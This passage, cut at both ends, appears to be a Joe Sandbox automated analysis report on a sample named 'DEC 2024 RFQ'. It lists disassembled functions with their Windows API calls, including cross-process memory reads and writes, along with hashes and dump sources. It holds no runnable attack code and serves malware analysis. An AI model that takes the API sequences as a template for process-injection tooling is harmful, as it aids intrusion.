                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3225163088-0
                                                                                                                      • Opcode ID: ae2195aef545bb747d5a2c896f0abdf476fa5542ba09faf35406d1b9db9a4c60
                                                                                                                      • Instruction ID: 93ddbd649be225f72a5fb6eeb4b1025ebe229add7cc3d1a37168d1e5ddbfe114
                                                                                                                      • Opcode Fuzzy Hash: ae2195aef545bb747d5a2c896f0abdf476fa5542ba09faf35406d1b9db9a4c60
                                                                                                                      • Instruction Fuzzy Hash: 5B21B630800654EFEB10CF55ED847AD3BE9FB14716F244626F814BA1B0DBB89991CF90
                                                                                                                      Function 0007BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2931989736-0
                                                                                                                      • Opcode ID: c63176f4c6bf11eb7be622220f7a2904ab36585bcce7966750509f126a1b9b76
                                                                                                                      • Instruction ID: c12fe93914d91c31c845ae914e55dcd1ceece2a46586023ee252ebc1bfd66817
                                                                                                                      • Opcode Fuzzy Hash: c63176f4c6bf11eb7be622220f7a2904ab36585bcce7966750509f126a1b9b76
                                                                                                                      • Instruction Fuzzy Hash: 3D01B5B2A001097BD2157A119D42FFFBB5CDF50398F04C021FE0D9A243FB54DE1082A8
                                                                                                                      Function 00084A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00084ABA
                                                                                                                      • __beginthreadex.LIBCMT ref: 00084AD8
                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00084AED
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00084B03
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00084B0A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3824534824-0
                                                                                                                      • Opcode ID: 36e0140572639bf633e86d5fb24f2db2a7892841a76868974452bd933129a53c
                                                                                                                      • Instruction ID: 345b492b6d11a664b1bc27fa5a18fdb134710f587d4b3778b12daae7b85af041
                                                                                                                      • Opcode Fuzzy Hash: 36e0140572639bf633e86d5fb24f2db2a7892841a76868974452bd933129a53c
                                                                                                                      • Instruction Fuzzy Hash: 1D114872904645BBEB009FA89C44AAB7FACFB46321F144269F914D7250D779C90087A0
                                                                                                                      Function 00078202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0007821E
                                                                                                                      • GetLastError.KERNEL32(?,00077CE2,?,?,?), ref: 00078228
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00077CE2,?,?,?), ref: 00078237
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00077CE2,?,?,?), ref: 0007823E
                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00078255
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842720411-0
                                                                                                                      • Opcode ID: 54ba310b12ee571cf47bee2223fca75ff80c382a363b480abe1f4a301b085582
                                                                                                                      • Instruction ID: 4733d9f85b45c7dc2471d48cf36d3269d81cb98f4e7c1d27d81997a38831ac59
                                                                                                                      • Opcode Fuzzy Hash: 54ba310b12ee571cf47bee2223fca75ff80c382a363b480abe1f4a301b085582
                                                                                                                      • Instruction Fuzzy Hash: B1016D71740605BFEB205FA5DC4CD7B7BACEF8A756B508469F809C2220DA358C01CB60
                                                                                                                      Function 0007710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?,?,00077455), ref: 00077127
                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?), ref: 00077142
                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?), ref: 00077150
                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?), ref: 00077160
                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?), ref: 0007716C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3897988419-0
                                                                                                                      • Opcode ID: 65a774c2f5b73d748ded9521af6d6667e887a544c75149d1aff98699f92ad665
                                                                                                                      • Instruction ID: af80a22b0c726b885108b8e73776a5c0c4d56643e20ffde04713012b68e88524
                                                                                                                      • Opcode Fuzzy Hash: 65a774c2f5b73d748ded9521af6d6667e887a544c75149d1aff98699f92ad665
                                                                                                                      • Instruction Fuzzy Hash: 7A01DF76A00205BBEB104FA8DC44BAA7BECEF45B91F108174FD0CD6220DB39DD008BA0
                                                                                                                      Function 00085244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00085260
                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0008526E
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00085276
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00085280
                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000852BC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2833360925-0
                                                                                                                      • Opcode ID: 732782ad15e802baeee5077e8caec51dc8393a017bb3633cedc39946c38763bb
                                                                                                                      • Instruction ID: e66f36c05d1e07907bafa904bf3ee30d321a067f4386803c02673752acc17cd6
                                                                                                                      • Opcode Fuzzy Hash: 732782ad15e802baeee5077e8caec51dc8393a017bb3633cedc39946c38763bb
                                                                                                                      • Instruction Fuzzy Hash: C3011731D01A2ADBDF00EFE4EC49AEDBB78FB0E712F400566E981B2140CF3459548BA1
                                                                                                                      Function 0007810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00078121
                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0007812B
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0007813A
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00078141
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00078157
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: b37aa4adab19be80352b7f9ac069a5bea023869370b5ae33772d04fb05ccdd35
                                                                                                                      • Instruction ID: 04d10862721d1bbd80d3cc2956b6bee3a59ce38c0fb246adf507a89107e2e1aa
                                                                                                                      • Opcode Fuzzy Hash: b37aa4adab19be80352b7f9ac069a5bea023869370b5ae33772d04fb05ccdd35
                                                                                                                      • Instruction Fuzzy Hash: E0F0AF71340305AFEB511FA4EC8CE773BACEF4A755B404035F949C2150DF689901DB60
                                                                                                                      Function 0007C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0007C1F7
                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0007C20E
                                                                                                                      • MessageBeep.USER32(00000000), ref: 0007C226
                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 0007C242
                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0007C25C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3741023627-0
                                                                                                                      • Opcode ID: 39c78c1c2a90f826657223341db277bcba12c419526080f1f065b3f2c76baeda
                                                                                                                      • Instruction ID: 0770b543dabef2b72665646ff6838abe2356a3aff3ba0a5330ea136bfca12a01
                                                                                                                      • Opcode Fuzzy Hash: 39c78c1c2a90f826657223341db277bcba12c419526080f1f065b3f2c76baeda
                                                                                                                      • Instruction Fuzzy Hash: 6801A230804705ABFB255BA0ED4EFA677B8BB01B06F00426DA586A14E2DBE869458B94
                                                                                                                      Function 000213B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EndPath.GDI32(?), ref: 000213BF
                                                                                                                      • StrokeAndFillPath.GDI32(?,?,0005B888,00000000,?), ref: 000213DB
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 000213EE
                                                                                                                      • DeleteObject.GDI32 ref: 00021401
                                                                                                                      • StrokePath.GDI32(?), ref: 0002141C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2625713937-0
                                                                                                                      • Opcode ID: a450bbd1d529531662bf30da04ec8bdc22242c440a34ed39c7b6ac83f9ee5401
                                                                                                                      • Instruction ID: 12ac2b80d996f90119f9b1eb191346b4fa87d56bc46762b46a9753f3e78fe579
                                                                                                                      • Opcode Fuzzy Hash: a450bbd1d529531662bf30da04ec8bdc22242c440a34ed39c7b6ac83f9ee5401
                                                                                                                      • Instruction Fuzzy Hash: 0AF03130000B49EBEB155F56ED8CBA83FE5AB1172BF088624E4696C0F1CB784595DF10
                                                                                                                      Function 00032CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00040DB6: std::exception::exception.LIBCMT ref: 00040DEC
                                                                                                                        • Part of subcall function 00040DB6: __CxxThrowException@8.LIBCMT ref: 00040E01
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 00027A51: _memmove.LIBCMT ref: 00027AAB
                                                                                                                      • __swprintf.LIBCMT ref: 00032ECD
                                                                                                                      Strings
                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00032D66
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                      • API String ID: 1943609520-557222456
                                                                                                                      • Opcode ID: 833670d3a9d9be271b8b3dc5289e9c199b08943e5fe7f751fd46eecff8008a0d
                                                                                                                      • Instruction ID: 534ac0a3985aca2c8a7f46b334c04a7b657788dd2b301b2875e84984a38e5b2a
                                                                                                                      • Opcode Fuzzy Hash: 833670d3a9d9be271b8b3dc5289e9c199b08943e5fe7f751fd46eecff8008a0d
                                                                                                                      • Instruction Fuzzy Hash: F09179711083119FC715EF24D886CAEB7E9EF85710F00492DF9969B2A2EB30ED84CB56
                                                                                                                      Function 0008B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00024750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00024743,?,?,000237AE,?), ref: 00024770
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0008B9BB
                                                                                                                      • CoCreateInstance.OLE32(000B2D6C,00000000,00000001,000B2BDC,?), ref: 0008B9D4
                                                                                                                      • CoUninitialize.OLE32 ref: 0008B9F1
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                      • Opcode ID: 5a513d16657d5ae84485b9fc41d4185e1f3577c72a1111fac0638b876e657bc9
                                                                                                                      • Instruction ID: e4b019107d3b7f22ff53df8212fe23b4a000df0fb6d97d9e25f03c41f8a1b26f
                                                                                                                      • Opcode Fuzzy Hash: 5a513d16657d5ae84485b9fc41d4185e1f3577c72a1111fac0638b876e657bc9
                                                                                                                      • Instruction Fuzzy Hash: 47A178756043119FCB14EF14C884DAABBE5FF89324F148998F8999B3A2CB31EC45CB91
                                                                                                                      Function 0004501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 000450AD
                                                                                                                        • Part of subcall function 000500F0: __87except.LIBCMT ref: 0005012B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                      • String ID: pow
                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                      • Opcode ID: 5f88179c0cdd82df9134e6864fa8ea1b22acc4250afb8d98704167e48375903f
                                                                                                                      • Instruction ID: 680055cfa88275d0d13a8b8c3d608144dffc9039566cff7e22b2aabde69f572d
                                                                                                                      • Opcode Fuzzy Hash: 5f88179c0cdd82df9134e6864fa8ea1b22acc4250afb8d98704167e48375903f
                                                                                                                      • Instruction Fuzzy Hash: 38513CA5908A0197DB617714CD153AF2FD49B40703F208D6DECD5862ABDE388DDC9A8E
                                                                                                                      Function 00036192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$_memmove
                                                                                                                      • String ID: ERCP
                                                                                                                      • API String ID: 2532777613-1384759551
                                                                                                                      • Opcode ID: 77c6926fbdbbed4e2ca3fadb0dd6c31b5d881dd8b03fe9ecf5bec60dbef1a1cb
                                                                                                                      • Instruction ID: e2e18a7a4764759e5ec7b7533e4e22e6b26d3dfa48cfd9a2561b700786b4b446
                                                                                                                      • Opcode Fuzzy Hash: 77c6926fbdbbed4e2ca3fadb0dd6c31b5d881dd8b03fe9ecf5bec60dbef1a1cb
                                                                                                                      • Instruction Fuzzy Hash: 5E51C170900705EBDB25CF65C841BABB7F8EF04304F21856EE54ADB281E775EA40CB50
                                                                                                                      Function 000797F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000814BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00079296,?,?,00000034,00000800,?,00000034), ref: 000814E6
                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0007983F
                                                                                                                        • Part of subcall function 00081487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000792C5,?,?,00000800,?,00001073,00000000,?,?), ref: 000814B1
                                                                                                                        • Part of subcall function 000813DE: GetWindowThreadProcessId.USER32(?,?), ref: 00081409
                                                                                                                        • Part of subcall function 000813DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0007925A,00000034,?,?,00001004,00000000,00000000), ref: 00081419
                                                                                                                        • Part of subcall function 000813DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0007925A,00000034,?,?,00001004,00000000,00000000), ref: 0008142F
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000798AC
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000798F9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                      • Opcode ID: 52cdc87210843d22ecc8178fcdc0e2026f3720cb752cd187993d1ffbb28f1283
                                                                                                                      • Instruction ID: 99897aa9a665b7714bf6bd53d6a6b938d401347ba1988959220a077dac9b81c1
                                                                                                                      • Opcode Fuzzy Hash: 52cdc87210843d22ecc8178fcdc0e2026f3720cb752cd187993d1ffbb28f1283
                                                                                                                      • Instruction Fuzzy Hash: 41413E76D00218BFDB10EFA4CC81ADEBBB8EF09300F144199FA55B7191DA756E45CBA1
                                                                                                                      Function 000A7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
